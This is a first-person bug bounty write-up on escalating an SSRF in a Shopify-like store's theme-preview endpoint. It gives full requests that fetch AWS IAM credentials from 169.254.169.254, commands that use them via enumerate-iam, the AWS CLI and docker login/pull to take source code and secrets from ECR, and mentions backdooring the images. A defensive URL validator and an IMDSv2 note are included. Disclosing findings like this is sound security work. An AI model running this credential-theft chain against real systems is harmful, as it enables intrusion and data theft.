Hello Guys,
My name is Yazeed Bilal. I started bug hunting when I was 16 years old, and this is my first bug bounty write-up.
I will explain how I managed to escalate a P3 SSRF to a P1.
First, what is SSRF? SSRF (Server-Side Request Forgery) is a web security vulnerability that allows an attacker to cause the server-side application to make requests to an unintended location.
I found this vulnerability in an eCommerce website similar to Shopify, with all the same features Shopify has.
Ok, sorry ….
While researching this web app and inspecting every request, I found this request:
POST /themes/advance/get-preview/0 HTTP/2
Host: redacted.com
Cookie: REDACTED
User-Agent: REDACTED
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
preview_url=https://urlpreviewforyourshop.redacted.com/
This endpoint is used to preview your website theme while editing it.
Hmm… the first thing you do when you see this is change the domain or URL and check whether the endpoint is vulnerable to SSRF,
and that is what I did :)
I copied the Collaborator URL, pasted it in, and BOOM, I got a response from the oastify Collaborator:
<html><body>1cyz7itbpg9qacr5xm2zlrzjjgjogz</body></html>
I tested whether I could read local files using the file: protocol, but that did not succeed.
Next I tested whether I could escalate it and get a response from the AWS instance metadata service.
Request:
POST /themes/advance/get-preview/0 HTTP/2
Host: redacted.com
Cookie: REDACTED
User-Agent: REDACTED
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
X-Requested-With: XMLHttpRequest
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Te: trailers
Content-Type: application/x-www-form-urlencoded
Content-Length: 55
preview_url=http://169.254.169.254/latest/meta-data/iam/security-credentials/redacted-prod-node
Response:
HTTP/2 200 OK
Date: Tue, 21 Jan 2025 03:33:39 GMT
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: no-cache, private
X-Frame-Options: SAMEORIGIN
Cf-Cache-Status: DYNAMIC
Server: nginx
Alt-Svc: h3=":8080"; ma=76400
{
"Code" : "Success",
"LastUpdated" : "2025-01-21T03:23:50Z",
"Type" : "AWS-HMAC",
"AccessKeyId" : "SECRET",
"SecretAccessKey" : "SECRET",
"Token" : "IQoJb3JpZ2luX2VjELv//////////wE.........................AYgwVv9Z2AA97YaSU2yEDWO7X3qvvXJzBvLQbTz4OixLWGitd3oCsFh5rbF5Dd2w0giEKbT2Ux4G7S0dC62yqPvgfcy7",
"Expiration" : "2025-01-21T09:40:14Z"
}
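The request above works because preview_url is fetched without any check on where it points. As an added example (not code from the original write-up or from the affected application), here is a Python validator for such a parameter: it rejects non-HTTP schemes (so file: is out), hosts outside an allowlisted suffix (so a bare 169.254.169.254 is out), and any hostname that resolves to a link-local, private or loopback address. The ".redacted.com" suffix and the DNS table are constructed placeholders, and the resolver is injectable so the example runs offline.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Assumption: legitimate previews live only under the shop's own domain;
# ".redacted.com" is a placeholder for that domain, not a real value.
ALLOWED_HOST_SUFFIX = ".redacted.com"

# Constructed DNS table so the example runs offline (real code: socket.getaddrinfo).
SAMPLE_DNS = {
    "shop1.redacted.com": ["1.2.3.4"],           # any routable address
    "imds.redacted.com": ["169.254.169.254"],    # record pointing at IMDS
    "intranet.redacted.com": ["10.0.0.5"],       # RFC 1918 host
}

def sample_resolver(host, port):
    """Mimics socket.getaddrinfo's return shape for the constructed table."""
    if host not in SAMPLE_DNS:
        raise socket.gaierror(host)
    return [(socket.AF_INET, socket.SOCK_STREAM, 6, "", (ip, port))
            for ip in SAMPLE_DNS[host]]

def is_public_address(ip: str) -> bool:
    """False for loopback, RFC 1918, link-local (where IMDS lives), etc."""
    a = ipaddress.ip_address(ip)
    return not (a.is_private or a.is_loopback or a.is_link_local
                or a.is_multicast or a.is_reserved or a.is_unspecified)

def preview_url_rejection(url: str, resolver=socket.getaddrinfo):
    """Return None if the server may fetch url, else a reason string."""
    try:
        parts = urlsplit(url)
        port = parts.port or (443 if parts.scheme == "https" else 80)
    except ValueError as e:                      # e.g. malformed port
        return f"unparseable url: {e}"
    if parts.scheme not in ("http", "https"):   # also blocks file:, gopher:
        return f"scheme not allowed: {parts.scheme!r}"
    host = parts.hostname
    if not host or parts.username or parts.password:
        return "missing host or embedded credentials"
    if not host.endswith(ALLOWED_HOST_SUFFIX):  # bare IPs fail here too
        return f"host not in allowlist: {host}"
    try:
        infos = resolver(host, port)
    except socket.gaierror:
        return f"unresolvable host: {host}"
    for ip in {info[4][0] for info in infos}:
        if not is_public_address(ip):
            return f"{host} resolves to non-public address {ip}"
    # Caller must connect to the vetted IP and refuse redirects (DNS rebinding).
    return None
```

Enforcing IMDSv2 on the instance is the complementary control: it requires a PUT to obtain a session token first, so a plain GET through an SSRF like this one no longer returns credentials.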
Ok, so now I enumerated which privileges I could access with these credentials, using the enumerate-iam tool to enumerate the permissions of the AWS credentials:
Unfortunately, these credentials only gave me read access to information and had no real impact; even S3 was not included in these IAM credentials. But when I re-enumerated the IAM privileges I found something called ECR (Elastic Container Registry). After some research I realized that AWS ECR stores the Docker images used by the EC2 servers and scans them for software bugs or vulnerabilities.
Output of enumerate-iam.py:
........ecr.get_login_password worked()
...........
Time to check whether the credentials are usable in the AWS CLI:
$ export AWS_ACCESS_KEY_ID="[AccessKeyId]"
$ export AWS_SECRET_ACCESS_KEY="[SecretAccessKey]"
$ export AWS_DEFAULT_REGION="[region]"
$ export AWS_SESSION_TOKEN="[Token]"
$ aws ecr describe-repositories
Output example:
{
    "repositories": [
        {
            "registryId": "012345678910",
            "repositoryName": "ubuntu",
            "repositoryArn": "arn:aws:ecr:us-west-2:012345678910:repository/ubuntu"
        },
        {
            "registryId": "012345678910",
            "repositoryName": "test",
            "repositoryArn": "arn:aws:ecr:us-west-2:012345678910:repository/test"
        }
    ]
}
Now let's log in to Docker with the ECR Docker credentials (aws ecr get-login-password):
aws ecr get-login-password --region <region> | docker login --username AWS --password-stdin <account ID>.dkr.ecr.<region>.amazonaws.com
And now we have successfully logged in to Docker.
Now we can access all the Docker repository data (the web app source code):
$ docker pull <account ID>.dkr.ecr.<region>.amazonaws.com/<repository name>:vulnerable
..................
..................
..................
..................
..................
$ docker run <account ID>.dkr.ecr.<region>.amazonaws.com/<repository name>:vulnerable ls -la
Now we have the web app source code, so we can get all the API keys and secrets, including DB credentials, AWS S3 credentials, configs and endpoints…
Abusing AWS ECR has other impacts too: if we could use Docker to push malicious code into the repository layers, we could get a backdoor or reverse shell on employees' workstations and on the main web app servers.
Program : External
Bounty : $3K
and that’s all :)
Thanks